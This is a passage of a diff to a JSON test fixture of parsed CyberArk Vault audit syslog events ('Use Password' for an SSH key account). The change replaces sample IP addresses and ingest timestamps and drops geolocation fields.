\u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "gateway_station": "67.43.156.13", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:46:49\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:46:49Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e308\u003c/MessageID\u003e\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eUse Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eFOR FUN.\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUse Password\u003c/Message\u003e\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Use Password", "issuer": 
"Administrator", "rfc5424": true, "ca_properties": { "other": {}, "device_type": "Operating System", - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "policy_id": "UnixSSHKeys", "user_name": "adrian" }, - "file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", + "file": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian", "safe": "PSM", "station": "127.0.0.1", "action": "Use Password", 
@@ -292,8 +274,8 @@ "event": { "severity": 2, "reason": "FOR FUN.", - "ingested": "2021-06-09T10:24:32.348994500Z", - "original": "\u003c5\u003e1 2021-03-11T17:46:49Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:46:49\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:46:49Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eFOR FUN.\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e81.32.170.205\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty 
Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:46:49\",\"IsoTimestamp\":\"2021-03-11T17:46:49Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"FOR FUN.\",\"ExtraDetails\":\"\",\"Message\":\"Use Password\",\"GatewayStation\":\"81.32.170.205\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:52.374498300Z", + "original": "\u003c5\u003e1 2021-03-11T17:46:49Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:46:49\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:46:49Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n 
\u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eFOR FUN.\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:46:49\",\"IsoTimestamp\":\"2021-03-11T17:46:49Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"FOR FUN.\",\"ExtraDetails\":\"\",\"Message\":\"Use 
Password\",\"GatewayStation\":\"67.43.156.13\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "308", "kind": "event", "action": "use password", @@ -316,20 +298,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "adrian" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { @@ -352,7 +325,7 @@ }, "@timestamp": "2021-03-11T17:48:27.000Z", "file": { - "path": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian" + "path": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian" }, "ecs": { "version": "1.12.0" @@ -364,8 +337,8 @@ ], "ip": [ "10.0.2.2", - "34.123.103.115", - "81.32.170.205" + "67.43.156.15", + "67.43.156.13" ] }, "cyberarkpas": { 
@@ -373,20 +346,20 @@ "severity": "Info", "reason": "For fun and profit", "iso_timestamp": "2021-03-11T17:48:27Z", - "gateway_station": "81.32.170.205", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:48:27\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:48:27Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e308\u003c/MessageID\u003e\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eUse Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eFor fun and profit\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUse Password\u003c/Message\u003e\n \u003cGatewayStation\u003e81.32.170.205\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n 
\u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "gateway_station": "67.43.156.13", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:48:27\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:48:27Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e308\u003c/MessageID\u003e\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eUse Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eFor fun and profit\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUse Password\u003c/Message\u003e\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Use Password", "issuer": 
"Administrator", "rfc5424": true, "ca_properties": { "other": {}, "device_type": "Operating System", - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "policy_id": "UnixSSHKeys", "user_name": "adrian" }, - "file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", + "file": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian", "safe": "PSM", "station": "10.0.2.2", "action": "Use Password", 
@@ -400,8 +373,8 @@ "event": { "severity": 2, "reason": "For fun and profit", - "ingested": "2021-06-09T10:24:32.348997400Z", - "original": "\u003c5\u003e1 2021-03-11T17:48:27Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:48:27\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:48:27Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eFor fun and profit\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e81.32.170.205\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n 
\u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:48:27\",\"IsoTimestamp\":\"2021-03-11T17:48:27Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\",\"Station\":\"10.0.2.2\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"For fun and profit\",\"ExtraDetails\":\"\",\"Message\":\"Use Password\",\"GatewayStation\":\"81.32.170.205\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:52.374504300Z", + "original": "\u003c5\u003e1 2021-03-11T17:48:27Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:48:27\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:48:27Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse 
Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eFor fun and profit\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:48:27\",\"IsoTimestamp\":\"2021-03-11T17:48:27Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"10.0.2.2\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"For fun and profit\",\"ExtraDetails\":\"\",\"Message\":\"Use 
Password\",\"GatewayStation\":\"67.43.156.13\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "308", "kind": "event", "action": "use password", @@ -424,20 +397,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "adrian" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { @@ -460,7 +424,7 @@ }, "@timestamp": "2021-03-11T17:54:49.000Z", "file": { - "path": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian" + "path": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian" }, "ecs": { "version": "1.12.0" @@ -472,8 +436,8 @@ ], "ip": [ "10.0.2.2", - "34.123.103.115", - "81.32.170.205" + "67.43.156.15", + "67.43.156.13" ] }, "cyberarkpas": { 
@@ -481,20 +445,20 @@ "severity": "Info", "reason": "Because I say so", "iso_timestamp": "2021-03-11T17:54:49Z", - "gateway_station": "81.32.170.205", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:54:49\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:54:49Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e308\u003c/MessageID\u003e\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eUse Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eBecause I say so\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUse Password\u003c/Message\u003e\n \u003cGatewayStation\u003e81.32.170.205\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n 
\u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "gateway_station": "67.43.156.13", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:54:49\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:54:49Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e308\u003c/MessageID\u003e\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eUse Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eBecause I say so\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUse Password\u003c/Message\u003e\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Use Password", "issuer": 
"Administrator", "rfc5424": true, "ca_properties": { "other": {}, "device_type": "Operating System", - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "policy_id": "UnixSSHKeys", "user_name": "adrian" }, - "file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", + "file": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian", "safe": "PSM", "station": "10.0.2.2", "action": "Use Password", 
